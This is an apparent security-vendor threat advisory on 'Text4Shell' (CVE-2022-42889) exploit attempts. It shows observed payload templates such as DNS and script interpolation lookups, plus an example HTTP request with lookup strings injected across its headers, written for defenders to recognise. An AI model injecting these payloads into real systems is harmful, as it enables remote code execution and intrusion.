Threat Advisory: Monitoring CVE-2022-42889 “Text4Shell” Exploit Attempts

On October 17, 2022, the Wordfence Threat Intelligence team began monitoring for activity targeting CVE-2022-42889, or “Text4Shell” on our network of 4 million websites. We started seeing activity targeting this vulnerability on October 18, 2022.

Text4Shell is a vulnerability in the Apache Commons Text library versions 1.5 through 1.9 that can be used to achieve remote code execution. While the vulnerability itself is similar to last year’s vulnerability CVE-2021-44228 in Apache’s log4j library, the Apache Commons Text library is far less widely used in an unsafe manner and the likelihood of successful exploitation is significantly lower.

As the vulnerability allows remote code execution, it has a CVSS score of 9.8, indicating critical impact if successfully exploited. The issue was patched in version 1.10.0.

For more details on the data we have collected, continue reading below or Download a PDF of this post here.

Most of the payloads we have observed and are tracking appear in query string parameters or headers and use one of the following formats:

DNS prefix:

${dns:address:<victimdomain>.<unique identifier>.<listenerdomain>}

Example request:
GET / HTTP/1.1
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: ${dns:address|}
Accept-Encoding: ${dns:address|}
Accept-Language: ${dns:address|}
Access-Control-Request-Headers: ${dns:address|}
Access-Control-Request-Method: ${dns:address|}
Authentication: Bearer ${dns:address|}
Cookie: %5Bredacted%5D=%5Bredacted%5D;
Location: ${dns:address|}
Origin: ${dns:address|}
Referer: ${dns:address|}
Upgrade-Insecure-Requests: ${dns:address|}
X-Api-Version: ${dns:address|}
X-Csrf-Token: ${dns:address|}
X-Druid-Comment: ${dns:address|}
X-Origin: ${dns:address|}
X-Vismaservice: VSP

Script prefix:

${script:javascript:<rce payload>}

Example request:
GET /? HTTP/1.1
Accept-Encoding: gzip
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36

Url prefix:


Example request:
GET /wp-json/wp/v2/comments? HTTP/1.1
Accept-Encoding: gzip
User-Agent: Fuzz Faster U Fool v1.5.0-dev
Host: <redacted>

The vast majority of requests we are seeing are using the DNS prefix and are intended to scan for vulnerable installations – a successful attempt would result in the victim site making a DNS query to the attacker-controlled listener domain.
The script prefix is less common and is the method used to achieve actual code execution. We’ve seen a variety of payloads but all of these also appear to be intended to send a request back to a listener URL.
The url prefix is the least common one we have tracked and functions in the same way as the dns prefix.

Cyber Observables

The following IP addresses have sent out requests targeting the vulnerability. IP addresses marked with * have targeted multiple sites:*****************

We are seeing a number of listener hosts in use:

Most of these listeners are running Interactsh servers, which are frequently used by legitimate security teams to test for out-of-band interactions. It is possible, however, that at least some of these requests are being performed by bug bounty hunters or malicious actors.

New IP Addresses attacking CVE-2022-42889 will appear on the Wordfence Intelligence IP Threat Feed in the “rce” category as the feed is updated every 60 minutes.

The post Threat Advisory: Monitoring CVE-2022-42889 “Text4Shell” Exploit Attempts appeared first on Wordfence.

Leave a Reply

Your email address will not be published. Required fields are marked *


Tap To Call